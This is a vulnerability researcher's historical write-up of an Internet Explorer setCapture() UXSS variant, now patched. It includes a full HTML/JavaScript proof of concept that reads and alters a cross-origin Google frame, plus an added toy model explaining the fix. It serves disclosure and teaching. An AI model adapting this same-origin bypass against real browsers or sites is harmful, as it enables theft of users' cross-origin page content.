After playing around for a while with the original setCapture() UXSS technique (case #6445), I found that the fix didn’t cover all variations. Instead of capturing events on the top window, this variation moves the setCapture() call into a same-domain IFRAME, which still managed to grab event.srcElement from a cross-origin frame.

<HTML><HEAD><TITLE>setCapture() xDomain Variation</TITLE></HEAD>
<BODY>
<FONT SIZE="2" FACE="Tahoma"><B>setCapture xDomain through IFRAMES</B> - Again :( This is a little variation on case #6445 that I sent in February. Also works on IE7</FONT><BR>

<IFRAME NAME="xDomain" SRC="" WIDTH="500" HEIGHT="80"></IFRAME><BR>
<IFRAME SRC="http://www.google.com" WIDTH="500" HEIGHT="500"></IFRAME>
<SCRIPT LANGUAGE="JavaScript">
xDomain.document.write('<FONT SIZE="2" FACE="Tahoma">This is the IFRAME where I do the setCapture(). We do not need this text in order for this to work.<BR>Now, <B>click inside the Google IFRAME.</B></FONT>');
xDomain.document.close();

function setCaptureTimeout(){
	//This next line is the variation. Instead of setCapturing the main window, we do it to the empty (our domain) IFRAME.
	xDomain.document.body.setCapture();
	xDomain.document.body.onclick=function(){
		var parentWindow=obj=xDomain.event.srcElement;
		while (obj) {
			parentWindow=obj;
			obj=obj.parentElement;
		}
		parentWindow.document.body.insertAdjacentHTML('afterBegin','<BR><BR><H1>THIS SHOULD NOT BE POSSIBLE :(</H1>');
		xDomain.document.body.onclick=null;
		alert('Google innerText:\n' + parentWindow.document.body.innerText);
	}
}

// We execute with a timeOut because sometimes at this point, the IFRAME is not completeley rendered and
// it may not have -yet- a document.body to do the setCapture(). That's the only reason.
setTimeout('setCaptureTimeout()',100);
</SCRIPT>
</BODY>
</HTML>

The key insight here is that setCapture() routes all mouse events to the capturing element, including events that originate in a different-origin frame. By walking up the parentElement chain from event.srcElement, the script can reach the cross-origin document and read or modify its content. The patch for the original bug had focused on the top-level window case and missed this IFRAME variant.
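To make the failure mode and its remedy concrete, here is an added illustration that is not code from the PoC above and not IE's implementation. It is a toy DOM model in plain JavaScript (runs under Node) in which every node records the origin of the document that owns it; an `<iframe>` element belongs to the embedding document and the framed document's `html` node points back to it through a hypothetical `ownerFrame` link. The origins `https://attacker.example` and `https://victim.example` and all node names are constructed. The `unsafe` policy hands the raw `srcElement` to the capturing element, which is what the PoC relies on; the `safe` policy retargets the event to the nearest same-origin frame element before exposing it, so the handler's parentElement walk can only ever reach its own document.

```javascript
// Added illustration, not code from the PoC above and not IE's implementation:
// a toy DOM model that reproduces the flaw in miniature and shows the fix a
// browser needs. Every node records the origin of the document that owns it.
// An <iframe> element belongs to the embedding document; the html node of the
// framed document points back to it via the (hypothetical) ownerFrame link.

function makeNode(name, origin, parent, extra = {}) {
  return { name, origin, parent, ownerFrame: null, ...extra };
}

// Climb parentElement-style links to the document's root element.
// This stops at a document boundary, just like element.parentElement does.
function documentRoot(node) {
  while (node.parent) node = node.parent;
  return node;
}

// Retarget an event target for a listener that runs in listenerOrigin:
// step out through frame boundaries until the node is same-origin with the
// listener, so a cross-origin element is replaced by the <iframe> element
// that embeds its document. Returns null when no same-origin frame exists.
function retarget(target, listenerOrigin) {
  let node = target;
  while (node && node.origin !== listenerOrigin) {
    node = documentRoot(node).ownerFrame;
  }
  return node;
}

// Two dispatch policies for a mouse event while `capturer` holds capture.
// 'unsafe': hand the raw target to the capturing element (the pre-fix
// behaviour the PoC depends on). 'safe': retarget first.
function dispatchCapturedEvent(capturer, target, policy) {
  const src = policy === 'safe' ? retarget(target, capturer.origin) : target;
  return src ? { srcElement: src } : null;
}

// What the PoC's onclick handler does with event.srcElement: walk up to the
// root element and read that document's text.
function readDocumentText(event) {
  const root = documentRoot(event.srcElement);
  return { origin: root.origin, text: root.innerText };
}

// Constructed sample tree mirroring the PoC page (hypothetical origins).
function buildScenario() {
  const ATTACKER = 'https://attacker.example';
  const VICTIM = 'https://victim.example';

  const topHtml = makeNode('html', ATTACKER, null, { innerText: 'attacker top page' });
  const topBody = makeNode('body', ATTACKER, topHtml);

  // Same-origin IFRAME in which the PoC calls setCapture().
  const xDomainFrame = makeNode('iframe#xDomain', ATTACKER, topBody);
  const xDomainHtml = makeNode('html', ATTACKER, null, { innerText: '', ownerFrame: xDomainFrame });
  const xDomainBody = makeNode('body', ATTACKER, xDomainHtml);

  // Cross-origin IFRAME holding the victim document.
  const victimFrame = makeNode('iframe', ATTACKER, topBody);
  const victimHtml = makeNode('html', VICTIM, null, { innerText: 'victim secret text', ownerFrame: victimFrame });
  const victimBody = makeNode('body', VICTIM, victimHtml);
  const victimLink = makeNode('a', VICTIM, victimBody);

  return { xDomainBody, victimFrame, victimLink, ATTACKER, VICTIM };
}

// Simulate a click inside the victim frame while xDomain's body holds capture.
function runScenario(policy) {
  const s = buildScenario();
  const event = dispatchCapturedEvent(s.xDomainBody, s.victimLink, policy);
  return event ? readDocumentText(event) : null;
}

console.log('unsafe:', runScenario('unsafe'));
console.log('safe:  ', runScenario('safe'));
```

Under the `unsafe` policy the handler reaches the victim document and reads its text, which is exactly the PoC's alert; under the `safe` policy the same walk ends at the attacker's own top-level document, and an event from an unrelated top-level origin is not delivered at all. The check is deliberately placed at dispatch time rather than in the handler, because a fix that only guarded the top window (as the original patch did) leaves every other capturing element, such as the same-origin IFRAME here, still exposed.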

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.